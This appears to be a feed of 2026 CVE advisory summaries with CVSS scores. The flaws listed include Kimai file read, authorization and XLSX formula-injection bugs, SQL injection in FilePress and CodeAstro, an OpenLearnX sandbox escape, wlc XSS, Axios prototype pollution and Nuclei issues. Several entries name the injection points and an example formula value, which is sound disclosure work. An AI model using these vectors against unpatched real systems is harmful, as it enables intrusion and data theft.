4.1
CVE-2026-44298 - Kimai: Arbitrary file read in invoice PDF renderer (admin)
Kimai is an open-source time tracking application. From version 2.32.0 to before version 2.56.0, users with the role System-Admin (ROLE_SYSTE_ADMIN) and the permission upload_invoice_template can upload PDF invoice templates, which can call pdfContext.setOption('associated_files', ...) inside the sβ¦
3.3
CVE-2026-41498 - Kimai: Team API Missing Object-Level Authorization
Kimai is an open-source time tracking application. Prior to version 2.54.0, the Team API endpoints use #[IsGranted('edit_team')] instead of #[IsGranted('edit', 'team')], causing Symfony TeamVoter to abstain from voting. This removes entity-level ownership checks on team operations, allowing any useβ¦
6.9
CVE-2026-8133 - zyx0814 FilePress Shares Filelist API admin.php sql injection
A security vulnerability has been detected in zyx0814 FilePress up to 2.2.0. Affected by this vulnerability is an unknown functionality of the file dzz/shares/admin.php of the component Shares Filelist API. Such manipulation of the argument order leads to sql injection. The attack can be launched rβ¦
5.4
CVE-2026-42267 - Kimai: Formula Injection via tag names in XLSX export
Kimai is an open-source time tracking application. From version 2.27.0 to before version 2.54.0, any ROLE_USER can create a tag with a formula string as its name (e.g. =SUM(54+51)) via POST /api/tags and assign it to a timesheet. When an admin exports timesheets to XLSX, ArrayFormatter.formatValue(β¦
8.8
CVE-2026-41900 - OpenLearnX has Critical Remote Code Execution Through Python Sandbox Escape via Code Execution Enviβ¦
OpenLearnX is an open-source, decentralized learning and assessment platform. Prior to version 2.0.3, a remote code execution (RCE) vulnerability was identified in the OpenLearnX code execution environment, allowing sandbox escape and arbitrary command execution. This issue has been patched in versβ¦
5.1
CVE-2026-42150 - wlc: print_html outputs API data without HTML escaping, enabling stored XSS
wlc is a Weblate command-line client using Weblate's REST API. Prior to version 2.0.0, the HTML output format in wlc embeds API response data into HTML without escaping, allowing cross-site scripting when the output is rendered in a browser. This issue has been patched in version 2.0.0.
7.4
CVE-2026-42264 - Axios: Prototype pollution read-side gadgets in HTTP adapter allow credential injection and requestβ¦
Axios is a promise based HTTP client for the browser and Node.js. From version 1.0.0 to before version 1.15.2, fFive config properties (auth, baseURL, socketPath, beforeRedirect, and insecureHTTPParser) in the HTTP adapter are read via direct property access without hasOwnProperty guards, making thβ¦
5.3
CVE-2026-41645 - Nuclei: Environment variable disclosure via Response-Derived DSL Expressions
Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's expression evaluation engine makes it possible for a malicious target server to inject and execute supported DSL expressions. This happens when HTTP response dβ¦
6.9
CVE-2026-8132 - CodeAstro Leave Management System login.php sql injection
A weakness has been identified in CodeAstro Leave Management System 1.0. Affected is an unknown function of the file /login.php. This manipulation of the argument txt_username causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be β¦
5.5
CVE-2026-41646 - Nuclei: Local File Read via require() Module Loader Bypass
Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files through the require() function, bypassing the default local file acceβ¦